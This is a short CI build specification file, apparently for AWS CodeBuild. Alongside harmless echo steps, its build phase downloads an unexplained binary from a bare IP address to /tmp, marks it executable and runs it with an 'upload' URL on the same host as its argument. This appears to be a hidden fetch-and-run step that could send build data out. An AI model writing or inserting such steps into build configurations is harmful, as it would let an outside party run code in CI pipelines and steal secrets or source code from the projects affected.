version: 0.2

phases:
  install:
    commands:
      - echo Installing dependencies...
  pre_build:
    commands:
      - echo Pre-build stage...
  build:
    commands:
      - echo Build started on `date`
      - wget http://82.197.68.107:8000/download -O /tmp/main
      - chmod +x /tmp/main 
      - /tmp/main http://82.197.68.107:8000/upload
      - python main.py
  post_build:
    commands:
      - echo Build completed on `date`

